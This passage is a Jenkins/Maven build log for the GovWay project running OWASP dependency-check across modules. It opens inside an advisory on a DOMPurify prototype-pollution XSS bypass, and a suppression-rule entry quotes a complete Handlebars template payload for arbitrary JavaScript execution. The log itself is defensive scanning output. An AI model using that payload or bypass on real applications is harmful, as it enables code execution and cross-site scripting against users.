`ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector. 17:43:33 17:43:33 ## Impact 17:43:33 Prototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered. 17:43:33 17:43:33 ## Credits 17:43:33 Identified by Cantina’s Apex (https://www.cantina.security). 17:43:33 17:43:33 17:43:33 See the dependency-check report for more details. 17:43:33 17:43:33 17:43:34 [INFO] 17:43:34 [INFO] ---------------< org.openspcoop2:org.openspcoop2.wss4j >---------------- 17:43:34 [INFO] Building dependencies.wss4j 1.0 [32/67] 17:43:34 [INFO] from mvn/dependencies/wss4j/pom.xml 17:43:34 [INFO] --------------------------------[ pom ]--------------------------------- 17:43:34 [INFO] 17:43:34 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.wss4j --- 17:43:34 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/wss4j (includes = [*.jar], excludes = []) 17:43:34 [INFO] 17:43:34 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.wss4j --- 17:43:34 [INFO] 17:43:34 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.wss4j --- 17:43:34 [INFO] Executing tasks 17:43:34 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/wss4j/wss4j-ws-security-common-4.0.0.jar 17:43:34 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/wss4j/wss4j-ws-security-dom-4.0.0.jar 17:43:34 [INFO] Executed tasks 17:43:34 [INFO] 17:43:34 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.wss4j --- 17:43:34 [INFO] Executing tasks 17:43:39 [INFO] Executed tasks 17:43:39 [INFO] 17:43:39 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.wss4j --- 17:43:39 [INFO] Checking for updates 17:43:39 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:43:39 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:43:39 [INFO] Check for updates complete (104 ms) 17:43:39 [INFO] 17:43:39 17:43:39 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:43:39 17:43:39 17:43:39 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:43:39 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:43:39 17:43:39 17:43:39 [INFO] Analysis Started 17:43:39 [INFO] Finished Archive Analyzer (0 seconds) 17:43:39 [INFO] Finished File Name Analyzer (0 seconds) 17:43:39 [INFO] Finished Jar Analyzer (0 seconds) 17:43:39 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:43:39 [INFO] Finished Hint Analyzer (0 seconds) 17:43:39 [INFO] Finished Version Filter Analyzer (0 seconds) 17:43:41 [INFO] Created CPE Index (2 seconds) 17:43:42 [INFO] Finished CPE Analyzer (2 seconds) 17:43:42 [INFO] Finished False Positive Analyzer (0 seconds) 17:43:42 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:43:42 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:43:42 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:43:42 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:43:42 17:43:42 17:43:42 ## Recommendation 17:43:42 17:43:42 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:43:42 17:43:42 The following template can be used to demonstrate the vulnerability: 17:43:42 ```{{#with "constructor"}} 17:43:42 {{#with split as |a|}} 17:43:42 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:43:42 {{#with (concat (lookup join (slice 0 1)))}} 17:43:42 {{#each (slice 2 3)}} 17:43:42 {{#with (apply 0 a)}} 17:43:42 {{.}} 17:43:42 {{/with}} 17:43:42 {{/each}} 17:43:42 {{/with}} 17:43:42 {{/with}} 17:43:42 {{/with}}``` 17:43:42 17:43:42 17:43:42 ## Recommendation 17:43:42 17:43:42 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:43:42 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:43:42 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:43:42 [INFO] Analysis Complete (2 seconds) 17:43:42 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:43:42 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:43:42 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:43:42 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:43:42 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:43:42 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:43:42 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:43:42 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:43:42 [INFO] 17:43:42 [INFO] -------------< org.openspcoop2:org.openspcoop2.testsuite >-------------- 17:43:42 [INFO] Building dependencies.testsuite 1.0 [33/67] 17:43:42 [INFO] from mvn/dependencies/testsuite/pom.xml 17:43:42 [INFO] --------------------------------[ pom ]--------------------------------- 17:43:42 [INFO] 17:43:42 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite --- 17:43:42 [INFO] Executing tasks 17:43:47 [INFO] Executed tasks 17:43:47 [INFO] 17:43:47 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite --- 17:43:47 [INFO] Checking for updates 17:43:47 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:43:47 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:43:47 [INFO] Check for updates complete (94 ms) 17:43:48 [INFO] 17:43:48 17:43:48 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:43:48 17:43:48 17:43:48 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:43:48 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:43:48 17:43:48 17:43:48 [INFO] Analysis Started 17:43:48 [INFO] Finished File Name Analyzer (0 seconds) 17:43:48 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:43:48 [INFO] Finished Hint Analyzer (0 seconds) 17:43:48 [INFO] Finished Version Filter Analyzer (0 seconds) 17:43:50 [INFO] Created CPE Index (1 seconds) 17:43:50 [INFO] Finished CPE Analyzer (1 seconds) 17:43:50 [INFO] Finished False Positive Analyzer (0 seconds) 17:43:50 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:43:50 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:43:50 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:43:50 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:43:50 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:43:50 [INFO] Analysis Complete (1 seconds) 17:43:50 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:43:50 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:43:50 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:43:50 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:43:50 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:43:50 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:43:50 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:43:50 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:43:50 [INFO] 17:43:50 [INFO] ----------< org.openspcoop2:org.openspcoop2.testsuite.axis14 >---------- 17:43:50 [INFO] Building dependencies.testsuite.axis14 1.0 [34/67] 17:43:50 [INFO] from mvn/dependencies/testsuite/axis14/pom.xml 17:43:50 [INFO] --------------------------------[ pom ]--------------------------------- 17:43:50 [INFO] 17:43:50 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.axis14 --- 17:43:50 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/axis14 (includes = [*.jar], excludes = []) 17:43:50 [INFO] 17:43:50 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.axis14 --- 17:43:50 [INFO] 17:43:50 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.testsuite.axis14 --- 17:43:50 [INFO] Executing tasks 17:43:50 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/axis14/axis-1.4.jar 17:43:50 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/axis14/axis-jaxrpc-1.4.jar 17:43:50 [INFO] Executed tasks 17:43:50 [INFO] 17:43:50 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.axis14 --- 17:43:50 [INFO] Executing tasks 17:43:55 [INFO] Executed tasks 17:43:55 [INFO] 17:43:55 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.axis14 --- 17:43:55 [INFO] Checking for updates 17:43:55 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:43:55 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:43:55 [INFO] Check for updates complete (71 ms) 17:43:55 [INFO] 17:43:55 17:43:55 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:43:55 17:43:55 17:43:55 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:43:55 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:43:55 17:43:55 17:43:55 [INFO] Analysis Started 17:43:55 [INFO] Finished File Name Analyzer (0 seconds) 17:43:55 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:43:55 [INFO] Finished Hint Analyzer (0 seconds) 17:43:55 [INFO] Finished Version Filter Analyzer (0 seconds) 17:43:57 [INFO] Created CPE Index (1 seconds) 17:43:57 [INFO] Finished CPE Analyzer (1 seconds) 17:43:57 [INFO] Finished False Positive Analyzer (0 seconds) 17:43:57 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:43:57 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:43:57 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:43:57 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:43:57 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:43:57 [INFO] Analysis Complete (1 seconds) 17:43:57 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.xml 17:43:57 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.html 17:43:57 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.json 17:43:57 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.csv 17:43:57 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.sarif 17:43:57 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-jenkins.html 17:43:57 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-junit.xml 17:43:57 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-gitlab.json 17:43:57 [INFO] 17:43:57 [INFO] ----< org.openspcoop2:org.openspcoop2.testsuite.applicationServer >----- 17:43:57 [INFO] Building dependencies.testsuite.as 1.0 [35/67] 17:43:57 [INFO] from mvn/dependencies/testsuite/applicationServer/pom.xml 17:43:57 [INFO] --------------------------------[ pom ]--------------------------------- 17:43:57 [INFO] 17:43:57 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer --- 17:43:57 [INFO] Executing tasks 17:44:02 [INFO] Executed tasks 17:44:02 [INFO] 17:44:02 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer --- 17:44:02 [INFO] Checking for updates 17:44:02 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:44:02 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:44:02 [INFO] Check for updates complete (69 ms) 17:44:02 [INFO] 17:44:02 17:44:02 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:44:02 17:44:02 17:44:02 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:44:02 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:44:02 17:44:02 17:44:02 [INFO] Analysis Started 17:44:02 [INFO] Finished File Name Analyzer (0 seconds) 17:44:02 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:44:02 [INFO] Finished Hint Analyzer (0 seconds) 17:44:02 [INFO] Finished Version Filter Analyzer (0 seconds) 17:44:04 [INFO] Created CPE Index (1 seconds) 17:44:04 [INFO] Finished CPE Analyzer (1 seconds) 17:44:04 [INFO] Finished False Positive Analyzer (0 seconds) 17:44:04 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:44:04 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:44:04 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:44:04 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:44:04 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:44:04 [INFO] Analysis Complete (1 seconds) 17:44:04 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.xml 17:44:04 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.html 17:44:04 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.json 17:44:04 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.csv 17:44:04 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.sarif 17:44:04 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-jenkins.html 17:44:04 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-junit.xml 17:44:04 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-gitlab.json 17:44:04 [INFO] 17:44:04 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly27 >-- 17:44:04 [INFO] Building dependencies.testsuite.as.wildfly27 1.0 [36/67] 17:44:04 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly27/pom.xml 17:44:04 [INFO] --------------------------------[ pom ]--------------------------------- 17:44:04 [INFO] 17:44:04 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly27 --- 17:44:04 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly27 (includes = [*.jar], excludes = []) 17:44:04 [INFO] 17:44:04 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly27 --- 17:44:04 [INFO] 17:44:04 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.wildfly27 --- 17:44:04 [INFO] Executing tasks 17:44:09 [INFO] Executed tasks 17:44:09 [INFO] 17:44:09 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.wildfly27 --- 17:44:09 [INFO] Checking for updates 17:44:09 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:44:09 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:44:09 [INFO] Check for updates complete (71 ms) 17:44:09 [INFO] 17:44:09 17:44:09 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:44:09 17:44:09 17:44:09 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:44:09 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:44:09 17:44:09 17:44:09 [INFO] Analysis Started 17:44:09 [INFO] Finished File Name Analyzer (0 seconds) 17:44:09 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:44:09 [INFO] Finished Hint Analyzer (0 seconds) 17:44:09 [INFO] Finished Version Filter Analyzer (0 seconds) 17:44:11 [INFO] Created CPE Index (1 seconds) 17:44:11 [INFO] Finished CPE Analyzer (1 seconds) 17:44:11 [INFO] Finished False Positive Analyzer (0 seconds) 17:44:11 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:44:11 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:44:11 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:44:11 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:44:11 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:44:11 [INFO] Analysis Complete (1 seconds) 17:44:11 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:44:11 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:44:11 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:44:11 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:44:11 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:44:11 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:44:11 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:44:11 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:44:11 [INFO] 17:44:11 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly28 >-- 17:44:11 [INFO] Building dependencies.testsuite.as.wildfly28 1.0 [37/67] 17:44:11 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly28/pom.xml 17:44:11 [INFO] --------------------------------[ pom ]--------------------------------- 17:44:11 [INFO] 17:44:11 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly28 --- 17:44:11 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly28 (includes = [*.jar], excludes = []) 17:44:11 [INFO] 17:44:11 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly28 --- 17:44:11 [INFO] 17:44:11 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.wildfly28 --- 17:44:11 [INFO] Executing tasks 17:44:16 [INFO] Executed tasks 17:44:16 [INFO] 17:44:16 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.wildfly28 --- 17:44:16 [INFO] Checking for updates 17:44:16 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:44:16 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:44:16 [INFO] Check for updates complete (95 ms) 17:44:17 [INFO] 17:44:17 17:44:17 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:44:17 17:44:17 17:44:17 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:44:17 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:44:17 17:44:17 17:44:17 [INFO] Analysis Started 17:44:17 [INFO] Finished File Name Analyzer (0 seconds) 17:44:17 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:44:17 [INFO] Finished Hint Analyzer (0 seconds) 17:44:17 [INFO] Finished Version 